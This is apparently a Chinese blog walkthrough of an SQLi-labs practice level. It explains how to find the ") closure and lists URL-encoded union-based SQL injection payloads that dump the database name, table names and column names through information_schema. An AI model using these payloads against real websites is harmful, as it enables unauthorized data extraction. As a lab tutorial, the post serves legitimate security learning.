首先来了解语句构造方法：

输入id=1’显示正确，输入id=1”显示错误（如下图），可以看到后面有个)，说明这里跟前面less-3一样，也是用)来闭合，只不过这里从单引号变成了双引号

输入id=1”)--+成功执行（如下图），所以接下来我们就可以输入执行代码了

爆数据库：

id=-1")%20union%20select%201,2,database()--+

爆表

id=-1")%20union%20select%201,2,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1)--+

爆字段

id=-1")%20union%20select%201,2,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27emails%27%20limit%200,1)--+

最新文章

1. sqlyog导出json数据格式支持mysql数据转存mongodb
2. json序列化及反序列化
3. Atitit attilax总结的对于attilax重要的jsr规范，以及需要增加的jsr规范
4. mysql语句：批量更新多条记录的不同值[转]
5. MySQL 备份与还原详解
6. discuz如何设置游客可以浏览板块，但是不能查看帖子内容呢？
7. P107、面试题15：链表中倒数第K个结点
8. Java serialVersionUID
9. Catch That Cow
10. EasyUI - NumberSpinner 组件
11. Python：开发Sublime插件，方便PHP开发
12. ShellExecute快捷键大全
13. Bootstrap入门（五）表单
14. CSS3 @keyframes 用法（简单动画实现）
15. Python处理Excel生成CSV文档
16. datetimepicker日期框选择后,无法触发bootstrapValidator
17. 排序算法之快速排序的思想以及Java实现
18. elbow 求拐点
19. javax/servlet/jsp/jstl/core/Config
20. 转-软件测试人员在工作中如何运用Linux

热门文章

1. 以A表中的值快速更新B表中记录的方法
2. CentOS 7 编译安装clang+llvm
3. 解决clover配置文件conf.plist中nv_disable=1或者nvda_drv=1不生效或者说不能删除的问题
4. CF933E A Preponderant Reunion DP
5. python鸭子类型
6. CephFS 使用
7. springboot 接口参数校验
8. python pip安装解决方法
9. SOFABoot&SOFATracer
10. AppDir【创建缓存目录】【建议使用这个工具类】